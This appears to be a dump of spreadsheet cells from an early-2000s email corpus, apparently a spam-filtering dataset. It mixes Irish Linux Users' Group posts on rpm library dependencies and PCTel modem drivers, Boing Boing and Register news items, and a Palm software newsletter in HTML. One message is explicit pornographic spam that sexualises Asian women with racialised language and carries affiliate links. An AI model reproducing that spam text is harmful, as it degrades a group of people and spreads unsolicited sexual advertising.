 &gt; OK I'm upgrading vorbis on my machine and I'm getting
 &gt; the following:
 &gt; 
 &gt; # rpm -U libvorbis-* vorbis-tools-1.0-1.i386.rpm
 &gt; error: failed dependencies:
 &gt; 	libvorbisfile.so.0   is needed by SDL_mixer-1.2.0-4
 &gt; 	libvorbisfile.so.0   is needed by xmms-1.2.5-7
 &gt; 	libvorbisfile.so.0   is needed by tuxracer-0.61-5
 &gt; 
 &gt; This is because the new libvorbis.rpm only has libvorbisfile.so.3
 &gt; So is this a problem in the other packages depending on
 &gt; a specific version (libvorbisfile.so.0) rather than on the
 &gt; generic libvorbis.so ?
  This is a pain. 
  The only way you can resolve this, to my knowledge is to download the
 original libvorbis rpm and the new one. Remove the old one, then do:
  rpm -Uvh libvorbis-*
  RPM then assumes that you want both versions installed at the same time,
 and does so. Why you can't do this after you have one library already
 installed is beyond me.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Big Five record companies guilty of price fixing
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85512062
 Date: Not supplied
 Hypocrites in the recording industry have been screaming about people stealing 
 music. All the while, they've been robbing CD buyers. 
     ...five of the largest U.S. distributors of pre-recorded music CDs and 
     three large retailers agreed to pay millions of dollars in cash and free 
     CDs as part of an agreement on price-fixing allegations.  
 Link[1] Discuss[2]
 [1] http://blogcritics.org/archives/2002/09/30/123242.php#20020930123242
 [2] http://www.quicktopic.com/16/H/VL2YSRjKGRqHc
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Friday July 12
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     MS talks to self about not talking about home 802.11b range
     Doesn't actually announce something we all knew very little about already
         http://www.theregister.co.uk/content/4/26152.html
     PGP Outlook plugin has major security hole
     Relax, there's a patch
         http://www.theregister.co.uk/content/4/26145.html
     MS SQL Server multiple vulns
     Get your daily fixes
         http://www.theregister.co.uk/content/4/26144.html
     MS licensing deadline doom looms - buy or die
     Or defect...
         http://www.theregister.co.uk/content/4/26141.html
     Software in China, India to top $27bn by 2006
     And China to pass India, says Gartner
         http://www.theregister.co.uk/content/4/26135.html
 Personal Hardware
     Fox recommends hacked DVD players for The Simpsons
     Cartoon cuffs for Homer?
         http://www.theregister.co.uk/content/54/26139.html
 Internet
     Soap and WSDL 'must haves' for web services - IDC
     By the end of this year, already...
         http://www.theregister.co.uk/content/6/26138.html
     W3C releases first drafts of WSDL 1.2
     Open for comment and review
         http://www.theregister.co.uk/content/6/26137.html
 Net Security
     IE scripting flaw uncovered
     Full disclosure
         http://www.theregister.co.uk/content/55/26147.html
     PGP Outlook plugin has major security hole
     Relax, there's a patch
         http://www.theregister.co.uk/content/55/26145.html
     MS SQL Server multiple vulns
     Get your daily fixes
         http://www.theregister.co.uk/content/55/26144.html
     Attack of the Cyber-Terror Studies
     No pass mark for Dartmouth College
         http://www.theregister.co.uk/content/55/26143.html
 Business
     Liberty move on Telewest faces legal challenge
     Bondholders baulking...
         http://www.theregister.co.uk/content/7/26136.html
 Broadband
     Wales gets broadband boost
     Let's all move to Llandegwning
         http://www.theregister.co.uk/content/22/26146.html
 e-business
     Yahoo! Back! In! The! Black! 
     Reasons to be cheerful
         http://www.theregister.co.uk/content/23/26140.html
 The Vulture Central Mailbag
     Open source developers wary of MS graphics patent grab
     OpenGL mail
         http://www.theregister.co.uk/content/35/26156.html
     Fighting the Pigopolists with bricks not bluster
     Letters Routing around the RIAA
         http://www.theregister.co.uk/content/35/26154.html
 Bootnotes
     Welsh Assembly Web site sick
     Sorry to hear that
         http://www.theregister.co.uk/content/28/26153.html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</si>
  <si>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Subject: [ILUG] PCTel modules
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello again. I tried all the suggestions for the PCTel driver and at the end of it, everything still goes smoothly until I type "make" after I get the output from the ./configure. 
 However, there were a couple of things I noticed along the way. After typing 
 * cp configs/kernel-2.4...config .config
 * make oldconfig
 * make dep
 The 2nd to last line I got back said that the modversions.h file was not updated. When I looked at this path to the modversions.h file, it was 281 lines and every line started with a # mark. Is it the case that nothing is read on a line after a # mark (or am I just thinking of another language?) and so should I delete the # at certain places?
 Also, when I was in the pctel directory and typed "make", I noticed that a different subdirectory is taken to a different modversions.h file. Inside this other file, there's nothing at all. And so I moved the modversions.h file with 281 lines to the empty modversions.h file - and got a different reply after "make". The output after I moved the file over mostly looked like this:
 /usr/src/linux-2.4.18-3/linux/modversions.h:11:33: linux/modules/adb.ver: No such file or directory
 /usr/src/linux-2.4.18-3/linux/modversions.h:12:37: linux/modules/af_ax25.ver: No such file or directory
 /usr/src/linux-2.4.18-3/linux/modversions.h:13:36: linux/modules/af_ipx.ver: No such file or directory
 The odd lines being the path and the first half of the other lines are what's written after the # in the modversions.h file. Should there be a file at each of these (one at each of the 281 lines of the file) that I'd have to compile/make?
 It's taken plenty of elbow grease, but I'm glad it hasn't gone smoothly, it's a good learning experience. Again, any help is appreciated. Thanks, Eric
 _____________________________________________________________
 email services provided by trackbike.com, your source for alleycat and trackbike photos. submissions welcome.
 _____________________________________________________________
 Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net  http://www.everyone.net/?btn=tag
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Votre maintenance Informatique
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
 following mailing list posting:
     List:    IIU@iiu.taint.org
     From:    emailharvest@email.com
     Subject: ADV: Harvest lots of E-mail addresses quickly !
     Reason:  Post by non-member to a members-only list
 At your convenience, visit:
     http://iiu.taint.org/mailman/admindb/iiu
 to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Great DVD interaction tool, probably illegal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481626
 Date: Not supplied
 DVDSynth is an open source project that allows you to splice in your own 
 footage, alternate audio, subtitles, etc, to any DVD. This means that you can 
 insert your own non-sucky subtitles, make and circulate edit-lists that make 
 highlight reels for your favorite movies, etc, etc. It all amounts to a sweet 
 tool for making the audience into the _former audience_, participants in 
 entertainment. Of course, it's also illegal under the DMCA, since the tool also 
 necessarily circumvents the copy-prevention in pre-recorded DVDs to accomplish 
 its ends. Link[1] Discuss[2] (_via NTK[3]_)
 [1] http://www.roundelay.net/dvdsynth/prerelease.html
 [2] http://www.quicktopic.com/boing/H/ymptgyYcJan
 [3] http://www.ntk.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 13 Aug 2002, David Raistrick wrote:
 &gt; To actually answer Justin's question, (one can assume that he has
 &gt; rewrite_subject and report_header turned on because he wants them..and
 &gt; that he would like to be able to strip the added bits off before he sends
 &gt; them to razor) something as simple as the following would probably work
 &gt; just fine.  Just pipe your message through this, then on into
 &gt; razor-report:
 I wouldn't make that assumption.  I'd assume that rewrite_subject was on, 
 and report_header was off, because that's the default configuration, and 
 not everyone knows to go look in the user_prefs file to make those 
 changes.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</si>
  <si>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Asian Lesbo Sluts!                   22337
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Have you ever wondered how the hell these petite Asian girls,
 with their tiny little Asian holes, can accommodate such huge
 hard cocks? Oh, but they can expand, can't they!!!? Have you
 seen them spread their petite little legs wide open, exposing
 their tiny little wet holes? Doesn't that just make you want
 to ram your big, throbbing cock in? Well, click on the link
 below and jam that big cock of yours in these little Asian
 holes NOW!
 http://asian-sexfest.com?sp=ten_self&amp;stref=REFa101688i000001
 No more mail:
 http://203.31.88.12/bye.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Damian Conway in Belfast...
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,
 Damian Conway is in Belfast this week. He will be giving two talks:
 o Perl 6 - Tuesday, 3rd September, 7pm, Jury's, Belfast
 o Quantum::Superpositions - Thursday, 5th September, 7pm, Jury's, Belfast
 He is also doing training courses...
     http://www.kasei.com/training/damian/
 Wesley.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Personalize your Palm OS device
</t>
  </si>
  <si>
    <t xml:space="preserve">--1166300.1032541006905.JavaMail.Administrator.web5
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;If you can't read this email, please go to: &lt;a href="http://www.handango.com/palmnewsletter"&gt;http://www.handango.com/palmnewsletter&lt;/a&gt; 
 &lt;P&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="1"&gt;&lt;/td&gt;
     &lt;td width="348"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/TitleBar.gif" width="348" height="35"&gt;&lt;/td&gt;
     &lt;td align="right"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;font color="#6699CC"&gt;&lt;span class="PlatformTitle"&gt;Palm 
       OS&amp;reg; Edition&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
       &lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" class="Text" size="-2"&gt;Issue 
       #33, September 2002&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC" height="77"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td height="77"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;/font&gt; 
       &lt;table width="630" border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td width="129"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/GreenShirt.gif" width="121" height="83" hspace="10" vspace="2"&gt;&lt;/td&gt;
           &lt;td class="Text" valign="bottom" align="left"&gt; 
             &lt;p align="left"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-2" color="#000000"&gt;Personalize 
               your Palm OS device! This issue features apps that are as unique 
               as you are. Customize your launch screen, plan a trip, design a 
               special menu, protect your extra-special information and choose 
               your game: puzzles or tennis. It's all here in September's Handango 
               Champion newsletter!&lt;/font&gt;&lt;/p&gt;
             &lt;table width="99%" border="0" cellspacing="0" cellpadding="0"&gt;
               &lt;tr&gt;
                 &lt;td width="26%"&gt;
                   &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;span class="ToC"&gt;&lt;a href="#1"&gt;&lt;font color="#336699" size="-2"&gt;Featured 
                     Software&lt;/font&gt;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;font size="-2"&gt;&lt;span class="ToC"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/td&gt;
                 &lt;td width="21%"&gt; 
                   &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;font size="-2"&gt;&lt;span class="ToC"&gt;&lt;b&gt;&lt;a href="#2"&gt;&lt;font color="#336699"&gt;What's 
                     New&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/td&gt;
                 &lt;td width="25%"&gt; 
                   &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;font size="-2"&gt;&lt;span class="ToC"&gt;&lt;b&gt;&lt;a href="#3"&gt;&lt;font color="#336699"&gt;Tips 
                     Of The Trade&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/td&gt;
                 &lt;td width="28%"&gt; 
                   &lt;div align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;font size="-2"&gt;&lt;span class="ToC"&gt;&lt;b&gt;&lt;a href="#4"&gt;&lt;font color="#336699"&gt;Champion's 
                     Choice&lt;/font&gt;&lt;/a&gt;&lt;/b&gt; &lt;/span&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC" height="30"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td colspan="3" height="30"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/FeaturedSoftwareBar.gif" width="630" height="35"&gt;&lt;a name="1"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC" height="101"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
 	&lt;td align="right" valign="top" rowspan="7" width="392"&gt; 
 	  &lt;table border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF" align="left" width="392"&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43448&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;InfoSafe Plus&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;: Carry important personal info with you securely 
             and always have quick access to it.&lt;/font&gt;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&lt;font size="-1" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;$16.99&lt;br&gt;
             &lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43448&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Read 
             More&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
             &lt;b&gt;&lt;a href="http://www.handango.com/basket.jsp?siteId=159&amp;amp;platformId=1&amp;amp;addItem=43448" class="BuyNow"&gt;&lt;font color="#009933"&gt;Buy 
             Now&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td align="center" class="Text" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		  &lt;td align="center" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=15226&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Pocket 
             Cook Deluxe&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;: A full-featured recipe app with a menu 
             planner, shopping list and 4,000 supplied recipes.&lt;/font&gt;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&lt;font size="-1" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;$19.95&lt;br&gt;
             &lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=15226&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Read 
             More&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
             &lt;b&gt;&lt;a href="http://www.handango.com/basket.jsp?siteId=159&amp;amp;platformId=1&amp;amp;addItem=15226" class="BuyNow"&gt;&lt;font color="#009933"&gt;Buy 
             Now&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td align="center" class="Text" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		  &lt;td align="center" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43483&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Launcher 
             PLUS!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;: Customize your Palm with this cool application 
             launcher and use fun themes, colors and graphics.&lt;/font&gt;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;$18.00&lt;br&gt;
             &lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43483&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Read 
             More&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.handango.com/basket.jsp?siteId=159&amp;amp;platformId=1&amp;amp;addItem=43483" class="BuyNow"&gt;&lt;font color="#009933"&gt;&lt;br&gt;
 			Buy Now&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=40498&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;FlipDis&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;: 
             A fruit-flipping festival of fun comes to the screen of your Palm 
             handheld! &lt;i&gt;Price reduced!&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;$4.99&lt;br&gt;
             &lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=40498&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Read 
             More&lt;br&gt;
             &lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.handango.com/basket.jsp?siteId=159&amp;amp;platformId=1&amp;amp;addItem=40498" class="BuyNow"&gt;&lt;font color="#009933"&gt;Buy 
             Now&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap&gt;&amp;nbsp;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td class="Text" valign="top" height="32"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=31433&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Hexacto's 
             Tennis Addict&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;: Inspired by the U.S. Open? Purchase 
             this game before Sept. 30 and get a special offer!&lt;/font&gt;&lt;/td&gt;
 		  &lt;td align="right" valign="top" nowrap height="32"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;$19.95&lt;br&gt;
             &lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=31433&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Read 
             More&lt;br&gt;
             &lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;b&gt;&lt;a href="http://www.handango.com/basket.jsp?siteId=159&amp;amp;platformId=1&amp;amp;addItem=31433" class="BuyNow"&gt;&lt;font color="#009933"&gt;Buy 
             Now&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	  &lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td align="right" valign="top" rowspan="7"&gt;
 	  &lt;table width="220" border="0" cellspacing="0" cellpadding="0"&gt;
 		&lt;tr&gt; 
 		  &lt;td background="http://www.handango.com/imgs/TheChampion2002/GrayLineVertical.gif" valign="top" height="186"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/GrayLineTop.gif" width="220" height="17"&gt; 
             &lt;table width="209" border="0" cellspacing="3" cellpadding="2" align="center" background="http://www.handango.com/imgs/Blank.gif"&gt;
               &lt;tr align="center"&gt; 
                 &lt;td background="http://www.handango.com/imgs/Blank.gif" class="Text" valign="top" height="133"&gt; 
                   &lt;p class="TipNewsTitle" align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1" color="#336699"&gt;&lt;b&gt;&lt;img width="50" height="59" border="0" align="left" hspace="7" src="http://www.handango.com/imgs/TheChampion2002/people.gif" vspace="15"&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;i&gt;Psst...&lt;/i&gt; 
                     &lt;br&gt;
                     Handango offers all types of PDA users all types of useful 
                     software... &lt;br&gt;
                     Pass it on! &lt;/font&gt;&lt;/p&gt;
                   &lt;p class="TipNewsTitle" align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;Tell 
                     a friend (or 10) about Handango and earn a discount on your 
                     next software purchase.&lt;/font&gt;&lt;/p&gt;
                   &lt;p class="TipNewsTitle" align="center"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/promo.jsp?siteId=1" class="ReadMore"&gt;&lt;font color="#336699"&gt;Click 
                     here to find out how!&lt;/font&gt;&lt;/a&gt; &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
                   &lt;/td&gt;
 			  &lt;/tr&gt;
 			&lt;/table&gt;
 		  &lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt; 
 		  &lt;td&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/GrayLineBottom.gif" width="220" height="16"&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 	  &lt;/table&gt;
 	&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
 	&lt;td width="10" bgcolor="#6699CC" height="2"&gt;&amp;nbsp;&lt;/td&gt;
 	&lt;td width="10" height="2"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="8"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="640" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt; 
     &lt;td width="10" bgcolor="#6699CC"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="1"&gt;&lt;/td&gt;
     &lt;td colspan="2"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/WhatsNew.gif" width="410" height="35"&gt;&lt;a name="2"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="220" valign="bottom"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/TipsTitle.gif" width="220" height="32"&gt;&lt;a name="3"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width="9" bgcolor="#6699CC" height="271"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="1"&gt;&lt;/td&gt;
     &lt;td width="10" height="271"&gt;&lt;img src="http://www.handango.com/imgs/Blank.gif" width="10" height="1"&gt;&lt;/td&gt;
     &lt;td class="Text" height="271"&gt; 
       &lt;table width="160" border="1" cellspacing="5" cellpadding="1" align="right"&gt;
         &lt;tr&gt; 
           &lt;td bgcolor="#336699"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43645&amp;amp;catalog=1&amp;amp;siteId=159"&gt;&lt;img src="http://www.handango.com/imgs/TheChampion2002/cutepack.gif" width="160" height="160" align="right" border="0" vspace="0" hspace="0"&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td class="Text" align="right" height="27"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;i&gt;&lt;b&gt;CutePack 
             &lt;/b&gt;&lt;/i&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;b&gt;Travel&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;ol&gt;
         &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;
 		&lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=41925&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;London 
           Tube Guide&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
 		&lt;li&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="-1"&gt;&lt;a href="http://www.handango.com/PlatformProductDetail.jsp?platformId=1&amp;amp;productType=2&amp;amp;sectionId=0&amp;amp;productId=43086&amp;amp;catalog=1&amp;amp;siteId=159" class="ReadMore"&gt;&lt;font color="#336699"&gt;Conversions Pro&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/li&gt;
